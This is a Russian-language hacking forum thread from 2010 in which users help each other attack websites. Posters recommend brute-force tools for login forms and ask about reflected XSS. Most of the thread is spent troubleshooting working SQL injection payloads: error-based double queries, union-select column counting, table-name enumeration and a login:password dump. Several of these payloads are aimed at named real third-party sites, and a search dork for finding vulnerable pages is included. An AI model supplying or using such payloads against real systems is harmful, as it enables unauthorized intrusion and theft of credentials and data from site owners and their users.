Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,593
    Likes Received:
    406
    Reputations:
    196
    Скриптами, прогами. Можно даже легендарной Brutus-AE2(так вроде называется), там брут форм есть и Basic Auth
     
  2. .:GOGA:.

    .:GOGA:. Member

    Joined:
    28 Jun 2010
    Messages:
    92
    Likes Received:
    9
    Reputations:
    5
    Anexroid
    можно заюзать WebBruteForcer

    И если вход через .htaccess то имя пользователя моет быть уже другим!!
     
    #14262 .:GOGA:., 22 Jul 2010
    Last edited: 22 Jul 2010
  3. Дирижабль

    Дирижабль [ ✯✯✯ Ядерный Суицид ✯✯✯ ]

    Joined:
    6 Jan 2010
    Messages:
    369
    Likes Received:
    346
    Reputations:
    292
    не заметил(
    sry
     
    _________________________
    #14263 Дирижабль, 22 Jul 2010
    Last edited: 22 Jul 2010
  4. AKYLA

    AKYLA Elder - Старейшина

    Joined:
    29 Nov 2007
    Messages:
    108
    Likes Received:
    35
    Reputations:
    6
    Хорошо разбирающиеся люди в скулях, подскажите возможно ли закрутить тут что-то и вообще уязвимо тут что-то или нет, а то вроде как да и вроде как там MSSQL но нихрена не выходит :(
     
  5. Дирижабль

    Дирижабль [ ✯✯✯ Ядерный Суицид ✯✯✯ ]

    Joined:
    6 Jan 2010
    Messages:
    369
    Likes Received:
    346
    Reputations:
    292
    что за тупой линк какой ище mssql есле там редирект ?!
     
    _________________________
  6. life_glider

    life_glider Member

    Joined:
    13 Apr 2010
    Messages:
    43
    Likes Received:
    26
    Reputations:
    33
    копаю движок:
    PHP:
        echo "
            <form method=post>
                <input type=hidden name=goto value='"
    .$_SERVER['REQUEST_URI']."'>
                <p>Enter password: <input type=password name=password></p>
                <p><input type=submit value='Login'></p>
            </form>
        "
    ;
    можно ли провести пассивную-xss атаку? как и в каких браузерах?
     
  7. IMMORTAL_S

    IMMORTAL_S Member

    Joined:
    29 Apr 2010
    Messages:
    130
    Likes Received:
    9
    Reputations:
    2
    как же раскрутить скуль

    Всем привет!
    Помогите советом... как составить запрос, что бы хоть чтонить вывелось... ошибки, etc.
    (не могу дать ссылку, т.к. инфа важная)
    http://site.com/view.php?id=134
    Вот запрос:
    SELECT * FROM tbl_art WHERE `GRP_ID` IN (0) AND `OBJ_ID` IN (134)

    При view.php?id=134z
    SQL ERROR: Unknown column '134z' in 'where clause'

    При view.php?id=134z()
    SQL ERROR: Column count of mysql.proc is wrong. Expected 20, found 16. Created with MySQL 50077, now running 50148. Please use mysql_upgrade to fix this error.

    При view.php?id=999' - выдается сообщение о несуществующей статье (при 999, то же)

    При view.php?id=134' - стандартная ошибка sql синтаксиса

    При view.php?id=134)+and+(a
    SQL ERROR: Unknown column 'a' in 'where clause'

    При view.php?id=134)+union+select+(a
    SQL ERROR: Unknown column 'a' in 'field list'

    При view.php?id=134)+union+select+(user()
    SQL ERROR: The used SELECT statements have a different number of columns

    При view.php?id=134)+union+select+(1,2
    SQL ERROR: Operand should contain 1 column(s)

    При view.php?id=134)+union+select+(1),(2),(3),(4 - ошибки нет, но и нет текста статьи

    При view.php?id=134)+union+select+1,2,3,4--+ - так же, как и выше
     
  8. Dare

    Dare Elder - Старейшина

    Joined:
    26 Apr 2010
    Messages:
    53
    Likes Received:
    24
    Reputations:
    17
    Эта тема вопросы а не "Ей чуваки расскрутите скуль за меня!!1"
    site:свой.сайт.ху* filetype:php inurl:id - и тыкай любимые кавычки!!!
     
    #14268 Dare, 23 Jul 2010
    Last edited: 23 Jul 2010
  9. Dare

    Dare Elder - Старейшина

    Joined:
    26 Apr 2010
    Messages:
    53
    Likes Received:
    24
    Reputations:
    17
    IMMORTAL_S
    Трудно сказать без ссылки, хотя б в ПМ что ле раздавал )
    стандартные комбинации не подходят?
    Попробуй найти другие бажные скрипты, если есть один вполне вероятно что другие там тоже есть )
     
    #14269 Dare, 23 Jul 2010
    Last edited: 23 Jul 2010
  10. Дирижабль

    Дирижабль [ ✯✯✯ Ядерный Суицид ✯✯✯ ]

    Joined:
    6 Jan 2010
    Messages:
    369
    Likes Received:
    346
    Reputations:
    292
    IMMORTAL_S
    iew.php?id=999'+or+(select+count(*)+from+information_schema.tables+group+by+concat(version(),floor(rand(0)*2)))--+
     
    _________________________
    1 person likes this.
  11. IMMORTAL_S

    IMMORTAL_S Member

    Joined:
    29 Apr 2010
    Messages:
    130
    Likes Received:
    9
    Reputations:
    2
    [Feldmarschall], ты крут :cool:
    Хотя и пришлось чуть-чуть подправить(не сам код)... но это то что нужно! (метод с Duplicate ложу в копилку)
    2 Dare, остался только этот бажный))
    Всем спасибо!

    SQL ERROR: Duplicate entry '5.1.48-log1' for key 'group_key'
    SQL: SELECT * FROM tbl WHERE `GID` IN (0) AND `OID` IN (134) or (select count(*) from information_schema.tables group by concat(version(),floor(rand(0)*2)))-- )
     
    #14271 IMMORTAL_S, 23 Jul 2010
    Last edited: 23 Jul 2010
    2 people like this.
  12. linuxkernal

    linuxkernal New Member

    Joined:
    12 Mar 2010
    Messages:
    62
    Likes Received:
    0
    Reputations:
    0
    Я не могу получить правильное число столбцов и инфицированных колонке для получения данных

    http://games.cartoonnetworkhq.com/playGame.php?gameID=-229%20union%20all%20select%201,@@version,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23--
     
  13. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    2,007
    Likes Received:
    996
    Reputations:
    155
    linuxkernal, там двойной запрос. Раскручивать можно только, как слепую инъекцию, тоесть через "and ..."
     
  14. kamaz

    kamaz Elder - Старейшина

    Joined:
    31 Jan 2007
    Messages:
    151
    Likes Received:
    275
    Reputations:
    280
    linuxkernal
    А если почитать эту тему чуть выше, то можно найти решение ;)

    Code:
    http://games.cartoonnetworkhq.com/playGame.php?gameID=133 and+1=(select+count(*)+from+information_schema.tables+group+by+concat(version(),floor(rand(0)*2))+limit+1)/*
     
    3 people like this.
  15. ZARO

    ZARO Elder - Старейшина

    Joined:
    17 Apr 2009
    Messages:
    330
    Likes Received:
    129
    Reputations:
    54
    delete
     
    #14275 ZARO, 25 Jul 2010
    Last edited: 25 Jul 2010
  16. happygirl

    happygirl New Member

    Joined:
    10 Jul 2010
    Messages:
    8
    Likes Received:
    0
    Reputations:
    0
    почему не показать table_name?

    http://www.indiajournal.com/info/event.php?id=3041'+and+1=0+union+select+1,table_name,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36%20from%20information_schema.tables%20where%20table_schema=database() limit 1,1--+ :mad:
     
  17. Seravin

    Seravin Active Member

    Joined:
    25 Nov 2009
    Messages:
    476
    Likes Received:
    190
    Reputations:
    221
    http://www.indiajournal.com/info/event.php?id=3041%27+and+1=2+UnIoN+sElEct+1,tAble_NamE,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,%2021,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36%20%20from%20information_schema.tables%20where%20table_schema=database%28%29%20limit%201,1+--+%27
     
    1 person likes this.
  18. IMMORTAL_S

    IMMORTAL_S Member

    Joined:
    29 Apr 2010
    Messages:
    130
    Likes Received:
    9
    Reputations:
    2
    SQL ругается на "-" в имени базы

    Всем привет.
    Впервые столкнулся с такой проблемой... при запросе:
    Code:
    http://site.com/view/id/1+union+select+1,2,3,concat_ws(':',login,pass),5+from+[COLOR=DarkOrange]my[/COLOR][COLOR=Red]-[/COLOR][COLOR=DarkOrange]schema[/COLOR].members+limit+0,1--.html
    выдает ошибку:
    Code:
    Syntax error or access violation: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '[COLOR=Red]-[/COLOR][COLOR=DarkOrange]schema[/COLOR].members limit 0,1--' at line 10
    Убрать имя базы из запроса нельзя (хотя мот и есть какие хитрости) - выдает ошибку.
    Как же разобраться с этой "-" в запросе?
    ------------------------------------------------------------
    Вопрос решен добавлением "`"
     
  19. xFennyks

    xFennyks New Member

    Joined:
    25 Jul 2010
    Messages:
    17
    Likes Received:
    0
    Reputations:
    0
    в вэбулитен существует возможность при регистрации в email писать все что угодно . как можно это использовать?
     
  20. CyberHunter

    CyberHunter Active Member

    Joined:
    6 Jan 2010
    Messages:
    611
    Likes Received:
    117
    Reputations:
    37
    А что можно выжать из этого? Все равно для реги нужно подтверждения по мылу.
     
Thread Status:
Not open for further replies.